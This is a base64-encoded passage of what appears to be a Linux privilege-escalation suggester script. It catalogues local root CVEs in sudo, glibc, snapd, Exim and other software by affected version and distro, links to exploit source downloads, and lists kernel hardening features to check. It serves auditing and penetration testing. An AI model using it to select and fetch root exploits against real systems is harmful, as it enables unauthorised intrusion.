bHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29faHdjYXBfNjQuYwpleHBsb2l0LWRiOiA0MjI3NQphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZSwgd29ya3MgYWdhaW5zdCBtb3N0IFNVSUQtcm9vdCBiaW5hcmllcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzcwLENWRS0yMDE3LTEwMDAzNzFdJHt0eHRyc3R9IGxpbnV4X29mZnNldDJsaWIKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X29mZnNldDJsaWIuYwpleHBsb2l0LWRiOiA0MjI3MwphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDAwMDAxXSR7dHh0cnN0fSBSYXRpb25hbExvdmUKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjwyLjI3LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLHg4Nl82NApUYWdzOiBkZWJpYW49OXtsaWJjNjoyLjI0LTExK2RlYjl1MX0sdWJ1bnR1PTE2LjA0LjN7bGliYzY6Mi4yMy0wdWJ1bnR1OX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTcvTGliY1JlYWxwYXRoQnVmZmVyVW5kZXJmbG93LwpzcmMtdXJsOiBodHRwczovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE3L0xpYmNSZWFscGF0aEJ1ZmZlclVuZGVyZmxvdy9SYXRpb25hbExvdmUuYwpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZApiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE4LTEwMDAwMDEvUmF0aW9uYWxMb3ZlCmV4cGxvaXQtZGI6IDQzNzc1CmF1dGhvcjogaGFsZmRvZwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDkwMF0ke3R4dHJzdH0gdnBuY19wcml2ZXNjLnB5ClJlcXM6IHBrZz1uZXR3b3JrbWFuYWdlci12cG5jfG5ldHdvcmstbWFuYWdlci12cG5jLHZlcjwxLjIuNgpUYWdzOiB1YnVudHU9MTYuMDR7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4xLjkzLTF9LGRlYmlhbj05LjB7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4yLjQtNH0sbWFuamFybz0xNwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9wdWxzZXNlY3VyaXR5LmNvLm56L2Fkdmlzb3JpZXMvTk0tVlBOQy1Qcml2ZXNjCnNyYy11cmw6IGh0dHBzOi8vYnVnemlsbGEubm92ZWxsLmNvbS9hdHRhY2htZW50LmNnaT9pZD03NzkxMTAKZXhwbG9pdC1kYjogNDUzMTMKYXV0aG9yOiBEZW5pcyBBbmR6YWtvdmljCkNvbW1lbnRzOiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xNDY2NV0ke3R4dHJzdH0gcmFwdG9yX3hvcmd5ClJlcXM6IHBrZz14b3JnLXgxMS1zZXJ2ZXItWG9yZyxjbWQ6WyAtdSAvdXNyL2Jpbi9Yb3JnIF0KVGFnczogY2VudG9zPTcuNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc2VjdXJlcGF0dGVybnMuY29tLzIwMTgvMTAvY3ZlLTIwMTgtMTQ2NjUteG9yZy14LXNlcnZlci5odG1sCmV4cGxvaXQtZGI6IDQ1OTIyCmF1dGhvcjogcmFwdG9yCkNvbW1lbnRzOiBYLk9yZyBTZXJ2ZXIgYmVmb3JlIDEuMjAuMyBpcyB2dWxuZXJhYmxlLiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS03MzA0XSR7dHh0cnN0fSBkaXJ0eV9zb2NrClJlcXM6IHBrZz1zbmFwZCx2ZXI8Mi4zNyxjbWQ6WyAtUyAvcnVuL3NuYXBkLnNvY2tldCBdClRhZ3M6IHVidW50dT0xOC4xMCxtaW50PTE5ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2luaXRibG9nLmNvbS8yMDE5L2RpcnR5LXNvY2svCmV4cGxvaXQtZGI6IDQ2MzYxCmV4cGxvaXQtZGI6IDQ2MzYyCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2svYXJjaGl2ZS9tYXN0ZXIuemlwCmF1dGhvcjogSW5pdFN0cmluZwpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTAxNDldJHt0eHRyc3R9IHJhcHRvcl9leGltX3dpegpSZXFzOiBwa2c9ZXhpbXxleGltNCx2ZXI+PTQuODcsdmVyPD00LjkxClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTkvMDYvMDUvY3ZlLTIwMTktMTAxNDkvcmV0dXJuLXdpemFyZC1yY2UtZXhpbS50eHQKZXhwbG9pdC1kYjogNDY5OTYKYXV0aG9yOiByYXB0b3IKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTIxODFdJHt0eHRyc3R9IFNlcnYtVSBGVFAgU2VydmVyClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvU2Vydi1VL1NlcnYtVSBdClRhZ3M6IGRlYmlhbj05ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cudmFzdGFydC5kZXYvMjAxOS8wNi9jdmUtMjAxOS0xMjE4MS1zZXJ2LXUtZXhwbG9pdC13cml0ZXVwLmh0bWwKZXhwbG9pdC1kYjogNDcwMDkKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2d1eXdoYXRhZ3V5L0NWRS0yMDE5LTEyMTgxL21hc3Rlci9zZXJ2dS1wZS1jdmUtMjAxOS0xMjE4MS5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMvbG9jYWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEyMTgxL1NVcm9vdAphdXRob3I6IEd1eSBMZXZpbiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkNvbW1lbnRzOiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyB1c2VzIGJhc2ggZXhlYyB0ZWNobmlxdWUsIHJhdGhlciB0aGFuIGNvbXBpbGluZyB3aXRoIGdjYy4KRU9GCikKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xODg2Ml0ke3R4dHJzdH0gR05VIE1haWx1dGlscyAyLjAgPD0gMy43IG1haWRhZyB1cmwgbG9jYWwgcm9vdCAoQ1ZFLTIwMTktMTg4NjIpClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvc2Jpbi9tYWlkYWcgXQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm1pa2UtZ3VhbHRpZXJpLmNvbS9wb3N0cy9maW5kaW5nLWEtZGVjYWRlLW9sZC1mbGF3LWluLWdudS1tYWlsdXRpbHMKZXh0LXVybDogaHR0cHM6Ly9naXRodWIuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9yYXcvbWFzdGVyL0NWRS0yMDE5LTE4ODYyL2V4cGxvaXQuY3Jvbi5zaApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL3Jhdy9tYXN0ZXIvQ1ZFLTIwMTktMTg4NjIvZXhwbG9pdC5sZHByZWxvYWQuc2gKYXV0aG9yOiBiY29sZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTg2MzRdJHt0eHRyc3R9IHN1ZG8gcHdmZWVkYmFjawpSZXFzOiBwa2c9c3Vkbyx2ZXI8MS44LjMxClRhZ3M6IG1pbnQ9MTkKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZHlsYW5rYXR6LmNvbS9BbmFseXNpcy1vZi1DVkUtMjAxOS0xODYzNC8Kc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3NhbGVlbXJhc2hpZC9zdWRvLWN2ZS0yMDE5LTE4NjM0L3Jhdy9tYXN0ZXIvZXhwbG9pdC5jCmF1dGhvcjogc2FsZWVtcmFzaGlkCkNvbW1lbnRzOiBzdWRvIGNvbmZpZ3VyYXRpb24gcmVxdWlyZXMgcHdmZWVkYmFjayB0byBiZSBlbmFibGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMC05NDcwXSR7dHh0cnN0fSBXaW5nIEZUUCBTZXJ2ZXIgPD0gNi4yLjUgTFBFClJlcXM6IGNtZDpbIC14IC9ldGMvaW5pdC5kL3dmdHBzZXJ2ZXIgXQpUYWdzOiB1YnVudHU9MTgKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAucGhwCnNyYy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAuc2gKZXhwbG9pdC1kYjogNDgxNTQKYXV0aG9yOiBDYXJ5IENvb3BlcgpDb21tZW50czogUmVxdWlyZXMgYW4gYWRtaW5pc3RyYXRvciB0byBsb2dpbiB2aWEgdGhlIHdlYiBpbnRlcmZhY2UuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdApSZXFzOiBwa2c9c3Vkbyx2ZXI8MS45LjVwMgpUYWdzOiBtaW50PTE5LHVidW50dT0xOHwyMCwgZGViaWFuPTEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2JsYXN0eS9DVkUtMjAyMS0zMTU2L3ppcC9tYWluCmF1dGhvcjogYmxhc3R5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdCAyClJlcXM6IHBrZz1zdWRvLHZlcjwxLjkuNXAyClRhZ3M6IGNlbnRvcz02fDd8OCx1YnVudHU9MTR8MTZ8MTd8MTh8MTl8MjAsIGRlYmlhbj05fDEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL3dvcmF3aXQvQ1ZFLTIwMjEtMzE1Ni96aXAvbWFpbgphdXRob3I6IHdvcmF3aXQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTYxOF0ke3R4dHJzdH0gc2V0dWlkIHNjcmVlbiB2NC41LjAgTFBFClJlcXM6IHBrZz1zY3JlZW4sdmVyPT00LjUuMApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNy9xMS8xODQKZXhwbG9pdC1kYjogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDExNTQKRU9GCikKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMjIHNlY3VyaXR5IHJlbGF0ZWQgSFcva2VybmVsIGZlYXR1cmVzCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogTWFpbmxpbmUga2VybmVsIHByb3RlY3Rpb24gbWVjaGFuaXNtczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEtlcm5lbCBQYWdlIFRhYmxlIElzb2xhdGlvbiAoUFRJKSBzdXBwb3J0CmF2YWlsYWJsZTogdmVyPj00LjE1CmVuYWJsZWQ6IGNtZDpncmVwIC1FcWkgJ1xzcHRpJyAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcHRpLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHQ0Mgc3RhY2sgcHJvdGVjdG9yIHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFWRV9TVEFDS1BST1RFQ1RPUj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RhY2twcm90ZWN0b3ItcmVndWxhci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogR0NDIHN0YWNrIHByb3RlY3RvciBTVFJPTkcgc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19TVEFDS1BST1RFQ1RPUl9TVFJPTkc9eSx2ZXI+PTMuMTQKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdGFja3Byb3RlY3Rvci1zdHJvbmcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExvdyBhZGRyZXNzIHNwYWNlIHRvIHByb3RlY3QgZnJvbSB1c2VyIGFsbG9jYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfREVGQVVMVF9NTUFQX01JTl9BRERSPVswLTldKwplbmFibGVkOiBzeXNjdGw6dm0ubW1hcF9taW5fYWRkciE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL21tYXBfbWluX2FkZHIubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFByZXZlbnQgdXNlcnMgZnJvbSB1c2luZyBwdHJhY2UgdG8gZXhhbWluZSB0aGUgbWVtb3J5IGFuZCBzdGF0ZSBvZiB0aGVpciBwcm9jZXNzZXMKYXZhaWxhYmxlOiBDT05GSUdfU0VDVVJJVFlfWUFNQT15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwueWFtYS5wdHJhY2Vfc2NvcGUhPTAKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy95YW1hX3B0cmFjZV9zY29wZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgdW5wcml2aWxlZ2VkIGFjY2VzcyB0byBrZXJuZWwgc3lzbG9nCmF2YWlsYWJsZTogQ09ORklHX1NFQ1VSSVRZX0RNRVNHX1JFU1RSSUNUPXksdmVyPj0yLjYuMzcKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC5kbWVzZ19yZXN0cmljdCE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RtZXNnX3Jlc3RyaWN0Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSYW5kb21pemUgdGhlIGFkZHJlc3Mgb2YgdGhlIGtlcm5lbCBpbWFnZSAoS0FTTFIpCmF2YWlsYWJsZTogQ09ORklHX1JBTkRPTUlaRV9CQVNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9rYXNsci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogSGFyZGVuZWQgdXNlciBjb3B5IHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFSREVORURfVVNFUkNPUFk9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2hhcmRlbmVkX3VzZXJjb3B5Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBNYWtlIGtlcm5lbCB0ZXh0IGFuZCByb2RhdGEgcmVhZC1vbmx5CmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9LRVJORUxfUldYPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdHJpY3Rfa2VybmVsX3J3eC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2V0IGxvYWRhYmxlIGtlcm5lbCBtb2R1bGUgZGF0YSBhcyBOWCBhbmQgdGV4dCBhcyBSTwphdmFpbGFibGU6IENPTkZJR19TVFJJQ1RfTU9EVUxFX1JXWD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RyaWN0X21vZHVsZV9yd3gubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEJVRygpIGNvbmRpdGlvbnMgcmVwb3J0aW5nCmF2YWlsYWJsZTogQ09ORklHX0JVRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBBZGRpdGlvbmFsICdjcmVkJyBzdHJ1Y3QgY2hlY2tzCmF2YWlsYWJsZTogQ09ORklHX0RFQlVHX0NSRURFTlRJQUxTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19jcmVkZW50aWFscy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2FuaXR5IGNoZWNrcyBmb3Igbm90aWZpZXIgY2FsbCBjaGFpbnMKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTk9USUZJRVJTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19ub3RpZmllcnMubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEV4dGVuZGVkIGNoZWNrcyBmb3IgbGlua2VkLWxpc3RzIHdhbGtpbmcKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTElTVD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfbGlzdC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIG9uIHNjYXR0ZXItZ2F0aGVyIHRhYmxlcwphdmFpbGFibGU6IENPTkZJR19ERUJVR19TRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfc2cubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IENoZWNrcyBmb3IgZGF0YSBzdHJ1Y3R1cmUgY29ycnVwdGlvbnMKYXZhaWxhYmxlOiBDT05GSUdfQlVHX09OX0RBVEFfQ09SUlVQVElPTj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnX29uX2RhdGFfY29ycnVwdGlvbi5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIGZvciBhIHN0YWNrIG92ZXJydW4gb24gY2FsbHMgdG8gJ3NjaGVkdWxlJwphdmFpbGFibGU6IENPTkZJR19TQ0hFRF9TVEFDS19FTkRfQ0hFQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NjaGVkX3N0YWNrX2VuZF9jaGVjay5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogRnJlZWxpc3Qgb3JkZXIgcmFuZG9taXphdGlvbiBvbiBuZXcgcGFnZXMgY3JlYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9SQU5ET009eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsYWJfZnJlZWxpc3RfcmFuZG9tLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBGcmVlbGlzdCBtZXRhZGF0YSBoYXJkZW5pbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2xhYl9mcmVlbGlzdF9oYXJkZW5lZC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQWxsb2NhdG9yIHZhbGlkYXRpb24gY2hlY2tpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xVQl9ERUJVR19PTj15LGNtZDohIGdyZXAgJ3NsdWJfZGVidWc9LScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsdWJfZGVidWcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFZpcnR1YWxseS1tYXBwZWQga2VybmVsIHN0YWNrcyB3aXRoIGd1YXJkIHBhZ2VzCmF2YWlsYWJsZTogQ09ORklHX1ZNQVBfU1RBQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3ZtYXBfc3RhY2subWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhZ2VzIHBvaXNvbmluZyBhZnRlciBmcmVlX3BhZ2VzKCkgY2FsbAphdmFpbGFibGU6IENPTkZJR19QQUdFX1BPSVNPTklORz15CmVuYWJsZWQ6IGNtZDogZ3JlcCAncGFnZV9wb2lzb249MScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3BhZ2VfcG9pc29uaW5nLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2luZyAncmVmY291bnRfdCcgaW5zdGVhZCBvZiAnYXRvbWljX3QnCmF2YWlsYWJsZTogQ09ORklHX1JFRkNPVU5UX0ZVTEw9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3JlZmNvdW50X2Z1bGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEhhcmRlbmluZyBjb21tb24gc3RyL21lbSBmdW5jdGlvbnMgYWdhaW5zdCBidWZmZXIgb3ZlcmZsb3dzCmF2YWlsYWJsZTogQ09ORklHX0ZPUlRJRllfU09VUkNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9mb3J0aWZ5X3NvdXJjZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgL2Rldi9tZW0gYWNjZXNzCmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9ERVZNRU09eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0cmljdF9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFJlc3RyaWN0IEkvTyBhY2Nlc3MgdG8gL2Rldi9tZW0KYXZhaWxhYmxlOiBDT05GSUdfSU9fU1RSSUNUX0RFVk1FT